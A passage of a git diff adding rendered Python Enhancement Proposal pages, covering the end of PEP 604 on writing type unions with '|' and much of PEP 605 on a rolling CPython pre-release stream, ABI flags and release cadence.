Inspired by Scala [2] and Pike [3], this proposal adds operator +type.__or__(). With this new operator, it is possible to write +int | str instead of Union[int, str]. In addition to +annotations, the result of this expression would then be valid in +isinstance() and issubclass():

+
isinstance(5, int | str)
+issubclass(bool, int | float)
+
+
+

We will also be able to write t | None or None | t instead of +Optional[t]:

+
isinstance(None, int | None)
+isinstance(42, None | int)
+
+
+
+
+

Specification

+

The new union syntax should be accepted for function, variable and parameter annotations.

+
+

Simplified Syntax

+
# Instead of
+# def f(list: List[Union[int, str]], param: Optional[int]) -> Union[float, str]
+def f(list: List[int | str], param: int | None) -> float | str:
+    pass
+
+f([1, "abc"], None)
+
+# Instead of typing.List[typing.Union[str, int]]
+typing.List[str | int]
+list[str | int]
+
+# Instead of typing.Dict[str, typing.Union[int, float]]
+typing.Dict[str, int | float]
+dict[str, int | float]
+
+
+

The existing typing.Union and | syntax should be equivalent.

+
int | str == typing.Union[int, str]
+
+typing.Union[int, int] == int
+int | int == int
+
+
+

The order of the items in the Union should not matter for equality.

+
(int | str) == (str | int)
+(int | str | float) == typing.Union[str, float, int]
+
+
+

Optional values should be equivalent to the new union syntax

+
None | t == typing.Optional[t]
+
+
+

A new Union.__repr__() method should be implemented.

+
str(int | list[str])
+# int | list[str]
+
+str(int | int)
+# int
+
+
+
+
+

isinstance and issubclass

+

The new syntax should be accepted for calls to isinstance and issubclass as long as the Union items are valid arguments to isinstance and issubclass themselves.

+
# valid
+isinstance("", int | str)
+
+# invalid
+isinstance(2, list[int]) # TypeError: isinstance() argument 2 cannot be a parameterized generic
+isinstance(1, int | list[int])
+
+# valid
+issubclass(bool, int | float)
+
+# invalid
+issubclass(bool, bool | list[int])
+
+
+
+
+
+

Incompatible changes

+

In some situations, some exceptions will not be raised as expected.

+

If a metaclass implements the __or__ operator, it will override this:

+
>>> class M(type):
+...     def __or__(self, other): return "Hello"
+...
+>>> class C(metaclass=M): pass
+...
+>>> C | int
+'Hello'
+>>> int | C
+typing.Union[int, __main__.C]
+>>> Union[C, int]
+typing.Union[__main__.C, int]
+
+
+
+
+

Objections and responses

+

For more details about discussions, see links below:

+ +
+

1. Add a new operator for Union[type1, type2]?

+

PROS:

+
    +
  • This syntax can be more readable, and is similar to other languages (Scala, …)
  • +
  • At runtime, int|str might return a simple object in 3.10, rather than everything that +you’d need to grab from importing typing
  • +
+

CONS:

+
    +
  • Adding this operator introduces a dependency between typing and builtins
  • +
  • Breaks the backport (in that typing can easily be backported but core types can’t)
  • +
  • If Python itself doesn’t have to be changed, we’d still need to implement it in mypy, Pyre, PyCharm, +Pytype, and who knows what else (it’s a minor change see “Reference Implementation”)
  • +
+
+
+

2. Change only PEP 484 (Type hints) to accept the syntax type1 | type2 ?

+

PEP 563 (Postponed Evaluation of Annotations) is enough to accept this proposition, +if we accept to not be compatible with the dynamic evaluation of annotations (eval()).

+
>>> from __future__ import annotations
+>>> def foo() -> int | str: pass
+...
+>>> eval(foo.__annotations__['return'])
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<string>", line 1, in <module>
+TypeError: unsupported operand type(s) for |: 'type' and 'type'
+
+
+
+
+

3. Extend isinstance() and issubclass() to accept Union ?

+
isinstance(x, str | int) ==> "is x an instance of str or int"
+
+
+

PROS:

+
    +
  • If they were permitted, then instance checking could use an extremely clean-looking notation
  • +
+

CONS:

+
    +
  • Must migrate all of the typing module in builtin
  • +
+
+
+
+

Reference Implementation

+

A new built-in Union type must be implemented to hold the return +value of t1 | t2, and it must be supported by isinstance() and +issubclass(). This type can be placed in the types module. +Interoperability between types.Union and typing.Union must be +provided.

+

Once the Python language is extended, mypy [1] and other type checkers will +need to be updated to accept this new syntax.

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0604.rst

+

Last modified: 2024-02-16 17:06:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0605/index.html b/pep-0605/index.html new file mode 100644 index 00000000000..7acc863afc6 --- /dev/null +++ b/pep-0605/index.html @@ -0,0 +1,1419 @@ + + + + + + + + PEP 605 – A rolling feature release stream for CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 605 – A rolling feature release stream for CPython

+
+
Author:
+
Steve Dower <steve.dower at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
20-Sep-2019
+
Python-Version:
+
3.9
+
Post-History:
+
01-Oct-2019, 06-Oct-2019, 20-Oct-2019
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP was rejected in favour of PEP 602. The potential alpha/beta alternation +was deemed too confusing and the two year cadence between releases deemed too +long.

+
+
+

Abstract

+

For a long time, CPython’s nominal feature release cadence has been “every 18-24 +months”, and in recent years, has been pretty consistently on the “18 month” +end of that window. PEP 607 provides some common background on the problems +that arise due to that choice of cadence, as well as some of the risks that +need to be accounted for when proposing to change it.

+

The proposal in this PEP aims to allow CPython’s user base to self-select into +two distinct but overlapping groups:

+
    +
  • users of stable feature releases (and their associated maintenance release +streams) that are published every 24 months; and
  • +
  • early adopters of a new rolling release stream that takes the place of the +previous CPython pre-release process
  • +
+

As part of this proposal, the usage guidance given for beta releases would +become “suitable for production use only in environments with sufficiently +robust compatibility testing and operational monitoring capabilities”, rather +than the currently unqualified “not for production use”.

+

Similarly, the guidance given for alpha releases would be amended to state +“intended for library compatibility testing and the creation of ABI compatible +binary artifacts”, rather than simply saying “not for production use”.

+

The PEP authors believe these outcomes can be achieved by amending CPython’s +pre-release management process as described in the Proposal section below.

+

This PEP also proposes that the frequency of X.Y.0 releases be adjusted to +begin each new release series in August every two years (starting in 2021, +around two years after the release of Python 3.8.0).

+
+
+

Example Future Release Schedules

+

Under this proposal, Python 3.9.0a1 would be released in December 2019, two +months after the Python 3.8.0 baseline feature release in October 2019.

+

Assuming no further breaking changes were made to the full CPython ABI, the +3.9.0b2 release would then follow 2 months later in February 2020, continuing +through to 3.9.0b9 in April 2021.

+

Any time a breaking change to the full CPython ABI was introduced, the first +pre-release that included it would be marked as an alpha release.

+

3.9.0rc1 would be published in June 2021, 3.9.0rc2 in July 2021, and then +the full release published as 3.9.0 in August 2021.

+

The cycle would start over again in October 2021, with the publication +of 3.10.0a1 (4 months after the creation of the 3.9.x maintenance branch).

+

The exact schedule of maintenance releases would be up to the release team, +but assuming maintenance releases of 3.9.x were also to occur every other month +(offset from the 3.10.0 beta releases), the overall release timeline +would look like:

+
    +
  • 2019-12: 3.9.0a1
  • +
  • 2020-02: 3.9.0b2
  • +
  • … beta (or alpha) releases every other month
  • +
  • 2021-04: 3.9.0b9
  • +
  • 2021-06: 3.9.0rc1 (feature freeze, ABI freeze, pyc format freeze)
  • +
  • 2021-07: 3.9.0rc2
  • +
  • 2021-08: 3.9.0
  • +
  • 2021-09: 3.9.1, 3.8.x (final 3.8.x binary maintenance release)
  • +
  • 2021-10: 3.10.0a1
  • +
  • 2021-11: 3.9.2
  • +
  • 2021-12: 3.10.0b2
  • +
  • … beta (or alpha) and maintenance releases continue in alternate months
  • +
  • 2023-04: 3.10.0b10
  • +
  • 2023-05: 3.9.11
  • +
  • 2023-06: 3.10.0rc1 (feature freeze, ABI freeze, pyc format freeze)
  • +
  • 2023-07: 3.10.0rc2, 3.9.12
  • +
  • 2023-08: 3.10.0
  • +
  • 2023-09: 3.10.1, 3.9.13 (final 3.9.x binary maintenance release)
  • +
  • 2023-10: 3.11.0a1
  • +
  • 2023-12: 3.11.0b2
  • +
  • … etc
  • +
+

If we assume two additional pre-releases were made that introduced breaking +changes to the full CPython ABI in the 3.9.0a5 and 3.9.0a7 releases, then the +overall calendar would look like:

+
+../_images/pep-0605-example-release-calendar.png + +
+

Figure 1. Impact of the pre-release process changes on the calendar.

+
+
+

There are always two or three active maintenance branches in this model, +which preserves the status quo in that respect. The major difference is that +we would start encouraging publishers to provide pre-built binaries for the +pre-freeze rolling releases in addition to providing them for the stable +maintenance branches.

+
+../_images/pep-0605-overlapping-support-matrix.png + +
+

Figure 2. Testing matrix in the 18-month cadence vs. the 24-month

+
+
+

Package publishers targeting the full CPython ABI that choose to provide +pre-built binaries for the rolling pre-freeze releases would at least need +to build new wheel archives following the 3.9.0a1 release. Whether they needed +to publish updated binaries after subsequent alpha releases (e.g. 3.9.0a5 or +3.9.0a7 releases in the example timeline) would depend on whether or not they +were actually affected by the ABI breaks in those later releases.

+

As with the status quo, all package publishers wishing to provide pre-built +binaries for the final release will need to build new wheel archives following +the ABI freeze date. Unlike the status quo, this date will be clearly marked +by the publication of the first release candidate, and it will occur early +enough to give publishers a couple of months to get ready for the final release.

+
+
+

Example Future Release Announcements

+

If this PEP is accepted, the primary channels used to communicate the updated +pre-release management process to end users would be the Python 3.9 What’s New +document, and the release announcements themselves.

+

This section provides initial drafts of text that could be used for those +purposes.

+
+

Suggested “What’s New in Python 3.9” Entry

+

The following subsection would be added to the Python 3.9 What’s New document, +and then linked from each of the Python 3.9 alpha and beta announcements.

+
+

PEP 605: Changes to the pre-release management process

+

As detailed in PEP 605, the pre-release management process has been updated to +produce a rolling series of beta releases that are considered suitable for +production use in environments with sufficiently robust integration testing and +operational monitoring capabilities.

+

Under this new rolling model, the alpha and beta releases are intermingled as +part of a combined “pre-freeze” period, with alpha releases indicating breaks +in the full CPython ABI that may require recompilation of extension modules or +embedding applications, and beta releases indicating full binary compatibility +with the immediately preceding pre-release.

+

Unlike previous releases, publishing pre-built binaries for 3.9.0 alpha and beta +releases is actively encouraged, as a new pre-release ABI flag (“p”) is now +set when building and loading extension modules prior to the full CPython ABI +freeze, ensuring that all such pre-freeze extension module builds will be +ignored by post-freeze interpreter builds.

+

The full CPython ABI will be frozen, and the pre-release flag dropped from the +ABI flags, in 3.9.0rc1, which is expected to occur 2 months prior to the final +3.9.0 release (refer to the release schedule in PEP 596 for exact target dates).

+

For application developers, migrating to the rolling release stream provides +the opportunity to be actively involved in the design and development of +enhancements to the standard library and reference interpreter prior to the +next stable release. It also provides the opportunity to benefit from +interpreter performance enhancements up to a year or more before they become +available in a stable release.

+

For library developers that publish pre-built wheel archives, opting in to +supporting the 3.9.x rolling release stream in addition to the 3.8 stable +release series requires no specific action if the project is already publishing +either pure Python wheels (tagged as py3-none-any), or builds against the +stable C ABI (tagged as cp38-abi3-<platform>, or the equivalent from an +earlier CPython 3.x release). These same wheel archives will also be usable on +the subsequent 3.9 stable release series.

+

For library developers that publish pre-built wheel archives that are built +against the full CPython ABI, the binaries for the 3.9 stable release series +will need to be built after the full CPython ABI freeze (i.e. using 3.9.0rc1 or +later).

+

Developers of these libraries may also opt in to supporting the rolling release +stream by building against the 3.9.0a1 release (or a subsequent beta release) +and publishing the result as normal.

+

In the ideal case, binaries built this way will continue working all the way +through to the last pre-freeze release. However, if the project is affected by +a change in the full CPython C ABI during the pre-freeze period, then it will +be necessary to publish a maintenance update that rebuilds the affected binaries +against the alpha release that changed the relevant interface. In these cases, +a corresponding Python-Requires entry should be added to the project +metadata. For example, if a project is affected by an ABI change introduced in +3.9.0a5, then the Python-Requires entry to add would be:

+
Python-Requires: >= "3.9.0b6"; python_version == "3.9" and full_python_version != "3.9.0a5"
+
+
+

(This additional metadata ensures that the updated version won’t be installed on +earlier pre-releases in the 3.9 series that offer an older variant of the ABI)

+

As for application developers, library developers that choose to support the +rolling release stream will have the opportunity to provide feedback on new and +updated API designs before they’re locked down for multiple years in a stable +release (or before they’re included as a provisional API in a stable release +series).

+
+
+
+

Example announcement text for the 3.9.0a1 release

+

This is the first preview release of Python 3.9. As an alpha release, it is +intended for library and application compatibility testing and the creation of +ABI compatible binary artifacts. It is not recommended for use in production +environments.

+
+

Changes to the pre-release management process

+

CPython has switched to a new pre-release management process that is designed +to produce a rolling series of beta releases that are considered suitable for +production use in environments with sufficiently robust integration testing and +operational monitoring capabilities. Refer to the Python 3.9 What’s New +document (hyperlinked to relevant section) for details.

+
+
+

Major new features of the 3.9 series, compared to 3.8

+

Many new features for Python 3.9 are still being planned and written. Among the +major new features and changes already implemented:

+
    +
  • +
  • (Hey, fellow core developer or user of the rolling release stream, if a +feature you find important is missing from this list, let <the release +manager> know.)
  • +
+

The next pre-release of Python 3.9 is expected to be 3.8.0b2, currently scheduled for 2020-02-02.

+
+
+
+

Example announcement text for the 3.9.0b2 release

+

This is the second preview release of Python 3.9. As a beta release, it is +fully binary compatible with the preceding 3.9.0a1 release. It is recommended +for production use only in environments with sufficiently robust integration +testing and operational monitoring capabilities.

+

(Remainder as per 3.9.0a1 announcement, with updates for implemented changes +and the next expected release being 3.9.0b3)

+
+
+

Example announcement text for 3.9.0a5 (a mid-stream alpha release)

+

This is the fifth preview release of Python 3.9. As an alpha release, it is +NOT fully binary compatible with the preceding 3.9.0b4 release. This release is +intended for library and application compatibility testing and the creation of +ABI compatible binary artifacts. It is not recommended for use in production +environments.

+
+

Breaking changes in the full CPython ABI between 3.9.0b4 and 3.9.0a5

+
    +
  • new field ob_example added to the PyObject struct
  • +
  • provisional field tp_example removed from the PyTypeObject struct
  • +
+

Projects that are supporting the rolling release stream and require a rebuild +to restore binary compatibility should add the following metadata to their +updated release:

+
Python-Requires: >= "3.9.0b6"; python_version == "3.9" and full_python_version != "3.9.0a5"
+
+
+

(Remainder as per 3.9.0a1 announcement, with updates for implemented changes +and the next expected release being 3.9.0b6)

+
+
+
+

Example announcement text for 3.9.0rc1

+

This is the first release candidate for Python 3.9. As a release candidate, +this release is now feature complete, the full CPython ABI is now frozen, and +the pre-release marker has been removed from the ABI compatibility flags. It is +recommended for production use only in environments with sufficiently robust +integration testing and operational monitoring capabilities.

+
+

Preparation for the final 3.9.0 release

+

With the full CPython ABI now frozen, library developers targeting that ABI are +encouraged to build and publish binaries for the stable 3.9.x series.

+

Application developers that have not been testing against the rolling release +stream are encouraged to test their applications against the release candidate +and report any compatibility regressions not already mentioned in the Porting +Guide (hyperlinked to relevant What’s New section).

+

A second release candidate is planned for 2021-07-02, and then the final 3.9.0 +release is planned for 2021-08-02.

+
+
+

Major new features of the 3.9 series, compared to 3.8

+

Some of the major new features and changes in this release:

+
    +
  • +
  • (Hey, fellow core developer or user of the rolling release stream, if a +feature you find important is missing from this list, let <the release +manager> know.)
  • +
+
+
+
+
+

Motivation

+

The current CPython pre-release and release management processes were developed +in an era where automated continuous integration and operational monitoring +systems were still relatively immature. Since that time, many organisations +have adopted deployment models that allow them to incorporate new CPython +feature releases without adding substantially more risk than they incur for any +other code change. Newer deployment models, such as lightweight task specific +application containers, also make it easier to combine an application with a +language runtime in a CI pipeline, and then keep them together until the entire +container image is later replaced by an updated one.

+

In light of those changes in the wider environment, PEP 602 has proposed +reducing the feature delivery latency for the Python standard library and +CPython reference interpreter by increasing the frequency of CPython feature +releases from every 18-24 months to instead occur every 12 months.

+

Unfortunately, for many organisations, the cost of adopting a new Python release +doesn’t automatically scale down with a reduced number of changes in the release, +as the primary costs aren’t associated with resolving any discovered issues; +the primary costs are associated with the search for issues. This search may +involve manual testing of software systems, human review of written materials, +and other activities where the time required scales with the size of the +existing system, rather than with the number of changes between the versions of +Python.

+

For third party library developers, costs are primarily associated with the +number of distinct Python versions in widespread usage. This currently tends +to be influenced by a combination of which releases are still actively +maintained by python-dev, and which releases are the latest versions offered +by particular redistributors (with the Debian, Ubuntu LTS, and RHEL/CentOS +system Python versions being particularly popular development targets). In +addition to the basic CI cost of testing against more Python versions, having +more variants in widespread use can make it more difficult to determine when a +fault report is an actual error in the project, or an issue in the reporting +user’s environment.

+

PEP 602 proposes that affected organisations and projects simply switch to +adopting every second or third CPython release, rather than attempting to adopt +every release, but that creates its own set of new problems to be resolved, both +practical (e.g. deprecations would need to cover more than one release if we’re +expecting users to routinely skip releases) and cultural (e.g. with a larger +number of versions in active use, there is a much higher chance that open source +library maintainers will receive bug reports that only occur on Python versions +that they’re not using themselves).

+

PEP 598 was an initial attempt by one of the authors of this PEP to propose +an alternative scheme to reduce feature delivery latency by adopting a +semantic versioning style policy that allowed for the incremental delivery of +backwards compatible features within a release series, until that series +reached feature complete status. That variant still had the undesirable +consequence of imposing visible changes on end users that are happy enough +with the current release management model.

+

This PEP takes the view that both PEP 598 and PEP 602 share a common flaw: they +are attempting to satisfy the needs of two quite distinct audiences within the +constraints of a single release model, which results in conflicting design +requirements, and the need for awkward trade-offs between those conflicting +requirements. The proposal in this PEP aims to avoid that flaw by proposing the +creation of two distinct production-ready release streams, with the existing +release stream being largely left alone, while the new release stream is +tailored towards the audience that would most benefit from a reduction in +feature delivery latency.

+
+
+

Aims of this Proposal

+

The proposal in this PEP arises from making the following key assumptions:

+
    +
  • the vast majority of Python’s users aren’t actively clamouring for new +language and runtime level features, and instead only upgrade when either +the version they were previously using is no longer supported, when their +Python provider switches to offering them a newer version by default, or when +enough changes that are of interest to them have accumulated to make a +compelling case for upgrading
  • +
  • for many users of new releases, much of the work that arises when adopting a +new release doesn’t arise from compatibility issues at the language level, but +from compatibility issues at the component installation level (i.e. filename +and installation path changes)
  • +
  • that there’s a subset of Python’s user base that would be willing to run +production-ready pre-releases (akin to Windows Insider or Debian testing +builds) for at least some of their use cases
  • +
+

The core of the proposal in this PEP is changing the CPython pre-release process +to produce a rolling stream of incremental feature releases at a regular +cadence, and to ensure that most of those builds offer a sufficient level of +stability as to be suitable for use in appropriately managed production systems.

+

By adopting this approach, the proposal aims to provide an improved outcome +for almost all Python users and contributors:

+
    +
  • for users of the new incremental feature release stream, targeting the +pre-release phase allows for even lower feature delivery latency than the +annual cadence proposed in PEP 602;
  • +
  • for core developers working on new features, increased frequency and adoption +of pre-releases should improve pre-release feedback cycles;
  • +
  • for users of the established release stream, the increased adoption and +improved feedback cycles during the pre-release period should result in +increased feature maturity at the time of its first X.Y.0 release, as well +as higher levels of ecosystem readiness;
  • +
  • for Python library maintainers, the rolling stream of pre-releases will +hopefully provide more opportunities to identify and resolve design issues +before they make it into a full stable release than is offered by the current +pre-release management process; and
  • +
  • for developers of alternative Python implementations, the rolling stream of +pre-releases may provide an additional incentive for extension module authors +to migrate from the full CPython ABI to the Python stable ABI, which would +also serve to make more of the ecosystem compatible with implementations that +don’t emulate the full CPython C API.
  • +
+

That said, it is acknowledged that not all the outcomes of this proposal will be +beneficial for all members of the wider Python ecosystem:

+
    +
  • for Python library maintainers, both this PEP and PEP 602 would likely +result in user pressure to support the faster release cadence. While this PEP +attempts to mitigate that by clearly marking which pre-releases include +potentially breaking changes to the full CPython C ABI, and PEP 602 attempts +to mitigate it by keeping the minimum time between full releases at +12 months, it isn’t possible to eliminate this downside completely;
  • +
  • for third party extension module maintainers, both this PEP and PEP 602 would +likely result in user pressure to start supporting the stable ABI in order to +provide wheel archives that work on the new version as soon as it is +available. Whether that’s a net negative or not will depend on how the request +is presented to them (it could be a positive if the request comes in the form +of a courteous contribution to their project from a developer interested in +supporting the rolling pre-freeze releases);
  • +
  • for some users of the established release stream that rely on the +availability of pre-built wheel archives, switching to adopting a new release +every 12 months may be an acceptable rate increase, while moving consistently +to the 24 month end of the historical 18-24 month cadence would be an +undesirable rate reduction relative to the 18-month cycle used for recent +releases. Whether this proposal would be a net negative for these users will +depend on whether or not we’re able to persuade library maintainers that +it’s worth their while to support the upcoming stable release throughout its +pre-freeze period, rather than waiting until its API and ABI have been +frozen.
  • +
+
+
+

Proposal

+

The majority of the proposed changes in this PEP only affect the handling of +pre-release versions. The one change affecting full release versions is a +suggested change to their cadence.

+
+

Two year cadence for stable releases

+

With the rolling pre-freeze releases available to users that are looking to +use leading edge versions of the reference interpreter and standard library, +this PEP proposes that the frequency of X.Y.0 releases be adjusted to publish +a new stable release in August every two years (starting in 2021, +around two years after the release of Python 3.8.0).

+

This change is arguably orthogonal to the proposed changes to the handling of +the pre-freeze release period, but the connection is that without those +pre-release management changes, the downsides of a two-year full release cadence +would probably outweigh the upsides, whereas the opposite is true for a +12-month release cadence (i.e. with the pre-release management changes proposed +in this PEP in place, the downsides of a 12-month full release cadence would +outweigh the upsides).

+
+
+

Merging of the alpha and beta phases into a “pre-freeze” phase

+

Rather than continuing the status quo where the pre-release alpha and beta +phases are distinct and sequential, this PEP proposes that they instead be +combined into a single “pre-freeze” phase with a monotonically increasing serial +number on the releases.

+

Rather than denoting distinct phases, the “alpha” and “beta” names would +instead indicate whether or not the release contains breaking changes to the +full CPython C ABI:

+
    +
  • “alpha” releases would be “ABI breaking” releases where extension modules +built against the full CPython ABI in the preceding pre-release are not +necessarily going to load correctly
  • +
  • “beta” releases would be “binary compatible” releases, where extension modules +built against the full CPython ABI in the preceding pre-release are expected +to load correctly, as long as those modules abide by the following additional +criteria:
      +
    • the module must not be using any provisional or private C APIs (either from +the previous stable release series, or the in development pre-release series) +that were removed in this beta release, or were changed in an ABI incompatible +way
    • +
    • the module must not be using any C APIs that were deprecated in the previous +stable release series, and removed in this beta release
    • +
    +
  • +
+
+

Pre-freeze phase duration and cadence

+

Rather than being released monthly for a period of a few months while preparing +a new X.Y.0 release, pre-freeze releases would instead be consistently published +every two months.

+

The only time this would not be the case is during the two month release +candidate period for an upcoming X.Y.0 release (see the release candidate +section below for more details). This means two otherwise scheduled releases +would be skipped (one corresponding with the first release candidate date, one +with the final release date).

+

The pre-freeze phase would typically be expected to start 2 months after the +preceding stable X.Y.0 release.

+

The first pre-freeze release for any new release series will always be X.Y.0a1 +(as there is no preceding release with the same ABI version markers to judge +binary compatibility against).

+

Pre-freeze releases would gain an additional flag in their C ABI compatibility +markers to avoid binary compatibility issues with the eventual stable release.

+
+
+

Release policy for beta releases

+

This PEP proposes that the policy for beta releases be set as follows:

+
    +
  • as with current beta releases, the stable BuildBot fleet is expected to be +green prior to preparation and publication of the beta release
  • +
  • as with current beta releases, the release manager is expected to review +open release blocker issues prior to preparation and publication of the beta +release
  • +
  • as with current beta releases, any additions to the abi3 stable C ABI would +be expected to become a permanent part of that ABI unless and until that +stable ABI version is retired completely (Note: there are no current plans +to increment the stable ABI version)
  • +
  • unlike current beta releases, beta releases under this PEP would not be +considered feature complete for the next X.Y.0 release
  • +
  • unlike current beta releases, all APIs added since the last CPython feature +release (other than additions to the stable C ABI) would be considered +provisional
  • +
  • unlike current beta releases, beta releases under this PEP would be prepared +and published from the master development branch
  • +
  • unlike current alpha or beta releases, beta releases under this PEP would be +required to be fully ABI compatible with the immediately preceding pre-release +in the series (excluding any changes to provisional APIs, or the removal of +APIs that were deprecated in the previous release series)
  • +
+
+
+

Release policy for alpha releases

+

This PEP proposes that the policy for alpha releases be set as follows:

+
    +
  • as with current alpha releases, the stable BuildBot fleet is expected to be +green prior to preparation and publication of the alpha release
  • +
  • as with current alpha releases, the release manager is expected to review +open release blocker issues prior to preparation and publication of the beta +release
  • +
  • unlike current alpha release, the release manager would be expected to +target a similar level of stability to the current beta releases, even +for the alpha releases
  • +
+

Under this PEP, an alpha release would be published whenever it isn’t possible +to publish a release that satisfies the criteria for a beta release, and +allowing some additional time before making the release won’t resolve the issue.

+

It is expected that the full CPython API changing in a way that breaks ABI +compatibility (for example, a field may have been added to or removed from a +public struct definition) will be the most likely reason for publishing +additional alpha releases beyond the initial compatibility tag defining +X.Y.0a1 release, but the decision for any particular release rests with the +release manager.

+
+
+
+

Release candidate policy, phase duration, and cadence

+

Given the proposed changes to the alpha and beta release phases, the release +candidate phase would see the following related adjustments:

+
    +
  • Feature freeze, ABI freeze, pyc file format freeze, and maintenance branch +creation would all correspond with the creation of X.Y.0rc1 (currently these +occur across a mixture of X.Y.0b1, the last beta release, and X.Y.0rc1)
  • +
  • The X.Y.0 release candidate period would be extended from 3 weeks to 2 months
  • +
  • There would normally be two release candidates issued a month apart, but +additional candidates may be published at the release manager’s discretion
  • +
  • The final X.Y.0 release would occur between 1 and 4 weeks after the final +release candidate (depending if additional release candidates were needed +after the second)
  • +
  • If the final X.Y.0 release is delayed beyond the August target date, the +subsequent release series is not affected, and will still be scheduled for +August (now slightly less than two years later).
  • +
+

In addition to allowing more time for end user feedback on the release +candidate, this adjusted policy also provides additional time for maintainers +of Python projects to build and publish pre-built wheel archives for the new +stable release series, significantly improving the initial user experience of +the X.Y.0 release.

+
+
+

Changes to management of the CPython stable C ABI

+

The CPython stable ABI [5] makes the commitment that binary extension modules +built against any particular CPython release will continue to work on future +CPython releases that support the same stable ABI version (this version is +currently abi3).

+

Under the proposed rolling pre-freeze release model, this commitment would be +extended to also apply to the beta releases: once an intentional addition to the +abi3 stable ABI for the upcoming Python version has been shipped in a beta +release, then it will not be removed from future releases for as long as the +abi3 stable ABI remains supported.

+

Two main mechanisms will be available for obtaining community feedback on +additions to the stable ABI:

+
    +
  • the preferred mechanism will be to add new APIs to the full CPython API first, +and only promote them to the stable ABI after they have been included in at +least one published beta release and received relevant user feedback
  • +
  • for APIs where that approach is unavailable for some reason (e.g. some API +additions may serve no useful purpose when the full CPython API is available), +then developers may request that the release manager mark the next release +as an alpha release (even in the absence of an ABI break in the full CPython +API), and attempt to obtain further feedback that way
  • +
+

As a slight readability and usability improvement, this PEP also proposes the +introduction of aliases for each major stable ABI version:

+
#define Py_LIMITED_API_3_3 0x03030000
+#define Py_LIMITED_API_3_4 0x03040000
+#define Py_LIMITED_API_3_5 0x03050000
+#define Py_LIMITED_API_3_6 0x03060000
+#define Py_LIMITED_API_3_7 0x03070000
+#define Py_LIMITED_API_3_8 0x03080000
+#define Py_LIMITED_API_3_9 0x03090000
+// etc...
+
+
+

These would be used both in extension module code to set the target ABI +version:

+
#define Py_LIMITED_API Py_LIMITED_API_3_8
+
+
+

And also in the CPython interpreter implementation to check which symbols should +be made available:

+
#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= Py_LIMITED_API_3_9
+// A Python 3.9+ addition to the stable ABI would appear here
+#endif
+
+
+

The documentation for the rolling pre-freeze releases and the stable C ABI would +make it clear that extension modules built against the stable ABI in a later +pre-freeze release may not load correctly on an earlier pre-freeze release.

+

The documentation for alpha releases and the stable C ABI would make it clear +that even extension modules built against the stable ABI in an alpha release +may not load correctly on the next release if two alpha releases are published +in a row (this situation would ideally be rare).

+
+
+

Changes to management of the full CPython ABI

+

This PEP proposes two changes to the management of the full CPython ABI.

+
+

An explicit commit and NEWS file convention to mark ABI breaking changes

+

The proposal in this PEP requires that release managers be able to appropriately +mark a pre-freeze release as either an alpha or a beta release based on whether +or not it includes an ABI breaking change.

+

To assist in that process, core developers would be requested to include a +“(CPython ABI break)” marker at the beginning of all NEWS file snippets for +changes that introduce a breaking change in the full CPython C ABI.

+

The “CPython” marker is included to make it clear that these annotations relate +to the full CPython ABI, not the stable ABI.

+

For commit messages, the shorter marker “(ABI break)” would be placed at the +start of the summary line for the commit.

+

The pre-merge bots will be updated to ensure that if the ABI break marker +appears in one of the two locations, it appears in both of them.

+

If the marker is inadvertently omitted from the initial commit message and NEWS +entry, then the commit message marker should be included in the subsequent +commit that adds the marker to the NEWS entry.

+

In addition to being useful for release managers, these markers should also be +useful for developers investigating unexpected segfaults when testing against +the affected release.

+
+
+

Explicitly marking builds against the pre-freeze ABI

+

The full CPython ABI has long operated under a policy where binary +compatibility only applies within a release series after the ABI has been +declared frozen, and only source compatibility applies between different +release series.

+

This policy means that extension modules built against CPython pre-releases +prior to the ABI freeze for that release series may not actually load correctly +on the final release.

+

This is due to the fact that the extension module may be relying on provisional +or previously deprecated interfaces that were changed or removed in a later +alpha or beta release, or it may be due to public structures used by the +extension module changing size due to the addition of new fields.

+

Historically, adoption of alpha and beta releases has been low enough that this +hasn’t really been a problem in practice. However, this PEP proposes to actively +encourage widespread operational use of beta releases, which makes it desirable +to ensure that users of those releases won’t inadvertently publish binary +extension modules that cause segfaults for users running the release candidates +and final releases.

+

To that end, this PEP proposes amending the extension module SOABI marker +on non-Windows systems to include a new “p” flag for CPython pre-releases, and +only switch back to omitting that flag once the ABI for that particular X.Y.0 +version has been frozen on entry to the release candidate stage.

+

With this change, alpha and beta releases of 3.9.0 would get an SOABI tag of +cpython-39p, while all release candidates and final builds (for both 3.9.0 +and later 3.9.x releases) would get an unqualified SOABI tag of cpython-39

+

Debug builds would still add the “d” to the end of the tag, giving +cpython-39pd for debug builds of pre-releases.

+

On Windows systems, the suffix for tagged pyd files in pre-release builds +would include “p” as a pre-release marker immediately after the version number, +giving markers like “cp39p-win_amd64”.

+

A proposed reference implementation for this change is available at [4] (Note: +at time of writing, that implementation had not yet been tested on Windows).

+
+
+
+

Updating Python-Requires for projects affected by full C ABI changes

+

When a project first opts in to providing pre-built binary wheels for the +rolling pre-freeze release series, they don’t need to do anything special: they +would add the rolling release series to their build and test matrices and +publish binary archives that are flagged as being compatible with that release +series, just as they would if providing pre-built binary wheels after the +full CPython ABI freeze for that release series.

+

However, if the project is affected by a CPython ABI compatibility break in the +rolling release stream, then they will need to issue a version update that +includes both the new binary build, and a new environment constrained +Python-Requires marker.

+

For example, if a project supporting the rolling release stream was affected by +a CPython ABI compatibility break in the 3.9.0a5 release, then they would add +the following metadata entry on the version that published the updated binary +build:

+
Python-Requires: >= "3.9.0b6"; python_version == "3.9" and full_python_version != "3.9.0a5"
+
+
+

What this does is add an additional compatibility constraint as part of the +published packages, so Python 3.9.0 beta versions prior to 3.9.0b6 won’t +consider the updated package as a candidate for installation, and the only +alpha release that will consider the package is 3.9.0a5 itself.

+
+
+
+

Caveats and Limitations

+

Actual release dates may be scheduled up to a month earlier or later at +the discretion of the release manager, based on release team availability, and +the timing of other events (e.g. PyCon US, or the annual core developer +sprints). However, as one goal of the proposal is to provide a consistent +release cadence, adjustments should ideally be rare.

+

